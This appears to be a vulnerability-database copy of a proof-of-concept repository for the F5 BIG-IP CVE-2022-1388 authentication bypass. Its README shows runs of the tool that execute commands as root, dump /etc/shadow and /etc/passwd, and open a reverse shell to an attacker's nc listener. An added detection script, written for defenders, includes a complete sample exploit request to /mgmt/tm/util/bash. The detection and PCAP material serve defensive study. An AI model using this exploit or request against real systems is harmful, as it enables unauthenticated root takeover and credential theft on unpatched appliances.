Associated Vulnerability
Title: F5 BIG-IP access control error vulnerability (CVE-2022-1388)
Description: On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
Description
-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red teams
Readme
# CVE-2022-1388 RCE, Reverse Shell, and Auto-Export PCAP
### -- FOR EDUCATIONAL USE ONLY --
The author is not responsible or held liable for any actions taken with any aspect of this project/repository. I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same. Use at your own risk.
This exploit targets CVE-2022-1388, an authentication bypass in the iControl REST interface of F5 BIG-IP systems. See the F5 advisory (https://support.f5.com/csp/article/K23605346) for affected versions and other information.
Feel free to PR or report any issues. This was tested on a few vulnerable F5 VE in Google Cloud from a CentOS machine with Python 3.6
## Usage
```
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-e] [-q] [-s] [-lh LHOST] [-lp LPORT]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET, --RHOSTS TARGET
                        Target IP of vulnerable BIG-IP system
  -p PORT, --port PORT, --RPORT PORT
                        Target port on vulnerable BIG-IP system
  -c CMD, --cmd CMD, --command CMD
                        Command to run on target system
  -e, --export, --tcpdump
                        Export captured traffic and ssl-key.log | **Requires sudo privileges!
  -q, --quiet           Don't display banner
  -s, --shell           Launch an interactive shell
  -lh LHOST, --lhost LHOST, --LHOST LHOST
                        Required for -s [shell]; Local IP/interface to bind listener to
  -lp LPORT, --lport LPORT, --LPORT LPORT
                        Required for -s [shell]; Local port to bind listener to
```
## Remote Code Execution
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
```
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
```
## Reverse shell
```
Attacker:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
```
## Exporting a PCAP for analysis
Specifying the -e (--export) flag creates two files: detection.pcap and ssl-key.log. Both are overwritten every time -e is specified, so move or rename any files you want to keep. ssl-key.log is in the NSS key log format and can be imported into Wireshark via Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename to decrypt the TLS session to the target. Because the capture is taken with tcpdump, the script must be run with sudo whenever -e is used.
```
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
```
Before TLS Decryption:
<img width="784" alt="Wireshark 01" src="https://user-images.githubusercontent.com/58718722/209455397-a686fdc0-1b8e-408b-908b-0280166bf7d1.png">
Adding the automatically-exported ssl-key.log to the TLS preferences in Wireshark:
<img width="784" alt="Wireshark Preferences" src="https://user-images.githubusercontent.com/58718722/209455234-2cbfede9-0a89-4386-a362-7c1e37a67f29.png">
After TLS Decryption:
<img width="784" alt="Wireshark 02" src="https://user-images.githubusercontent.com/58718722/209455422-d22c87a9-be84-4262-a217-30621b67c89b.png">
<img width="728" alt="Wireshark 03" src="https://user-images.githubusercontent.com/58718722/209455326-751bc49a-a147-499d-b0c9-c6119668f5e9.png">
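A blue-team check for the decrypted requests that the -e workflow above produces, added here as an example; it is not code from vaelwolf's script or repository. It flags the publicly documented CVE-2022-1388 request pattern (from F5's K23605346 mitigation notes and public analyses, not from this page): X-F5-Auth-Token listed in the Connection header, which makes the front-end httpd drop the token as a hop-by-hop header before the request reaches the REST backend; Basic credentials for admin with an empty password; and a POST to /mgmt/tm/util/bash carrying utilCmdArgs. The two sample requests, their host/port and token values are constructed for the example.

```python
"""Flag CVE-2022-1388 indicators in a decrypted iControl REST request.

Indicators follow the publicly documented bypass pattern (F5 K23605346
and public write-ups); nothing here is taken from the PoC script itself.
"""
import base64
import json
from typing import Dict, List, Optional, Tuple

HOP_BY_HOP_TOKEN = "connection-header-lists-x-f5-auth-token"
EMPTY_ADMIN_PASSWORD = "basic-auth-admin-empty-password"
BASH_UTIL_EXEC = "post-mgmt-tm-util-bash-with-utilCmdArgs"


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, List[str]], str]:
    """Split a raw HTTP/1.1 request (e.g. from Wireshark's Follow TLS Stream)
    into (method, path, headers, body). Header names are lower-cased and
    repeated headers keep every value."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ")
    method, path = parts[0], (parts[1] if len(parts) > 1 else "")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return method, path, headers, body


def connection_tokens(headers: Dict[str, List[str]]) -> List[str]:
    """Lower-cased, comma-separated tokens of every Connection header."""
    tokens: List[str] = []
    for value in headers.get("connection", []):
        tokens.extend(t.strip().lower() for t in value.split(",") if t.strip())
    return tokens


def basic_auth_credentials(headers: Dict[str, List[str]]) -> Optional[Tuple[str, str]]:
    """Decode the first Basic Authorization header into (user, password)."""
    for value in headers.get("authorization", []):
        scheme, _, encoded = value.partition(" ")
        if scheme.lower() != "basic":
            continue
        try:
            decoded = base64.b64decode(encoded.strip(), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        user, _, password = decoded.partition(":")
        return user, password
    return None


def cve_2022_1388_findings(raw: str) -> List[str]:
    """Return the indicator names present in one request, in fixed order."""
    method, path, headers, body = parse_http_request(raw)
    findings: List[str] = []
    if "x-f5-auth-token" in connection_tokens(headers):
        findings.append(HOP_BY_HOP_TOKEN)
    creds = basic_auth_credentials(headers)
    if creds is not None and creds[0].lower() == "admin" and creds[1] == "":
        findings.append(EMPTY_ADMIN_PASSWORD)
    clean_path = path.split("?", 1)[0].rstrip("/").lower()
    if method.upper() == "POST" and clean_path == "/mgmt/tm/util/bash":
        try:
            payload = json.loads(body)
        except ValueError:
            payload = None
        if isinstance(payload, dict) and "utilCmdArgs" in payload:
            findings.append(BASH_UTIL_EXEC)
    return findings


def is_exploit_attempt(raw: str) -> bool:
    """Only the Connection-header trick is the bypass itself; the other two
    indicators can also appear in legitimate administrative use."""
    return HOP_BY_HOP_TOKEN in cve_2022_1388_findings(raw)


# Constructed samples (not captured from a real host). "YWRtaW46" is base64 of "admin:".
EXPLOIT_REQUEST = "\r\n".join([
    "POST /mgmt/tm/util/bash HTTP/1.1",
    "Host: 10.142.0.10:8443",
    "Authorization: Basic YWRtaW46",
    "X-F5-Auth-Token: 0",
    "Connection: keep-alive, X-F5-Auth-Token",
    "Content-Type: application/json",
    "Content-Length: 42",
    "",
    '{"command": "run", "utilCmdArgs": "-c id"}',
])

BENIGN_REQUEST = "\r\n".join([
    "GET /mgmt/tm/sys/version HTTP/1.1",
    "Host: 10.142.0.10:8443",
    "X-F5-Auth-Token: 7F2A0C2F1D3B4E5A6C7D8E9F0A1B2C3D",
    "Connection: keep-alive",
    "",
    "",
])

if __name__ == "__main__":
    for label, req in (("exploit", EXPLOIT_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, is_exploit_attempt(req), cve_2022_1388_findings(req))
```

Paste the request text from Wireshark's Follow TLS Stream view (after loading ssl-key.log) into the function. Alert on the Connection-header indicator alone; a POST to /mgmt/tm/util/bash with a valid token is something administrators do legitimately, so that indicator is better used to raise severity than to trigger on its own.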
File Snapshot
[4.0K] /data/pocs/e0cf15ae7a20b2877e3c4326c41860e547cdf6f6
├── [6.9K] CVE-2022-1388.py
└── [5.1K] README.md
0 directories, 2 files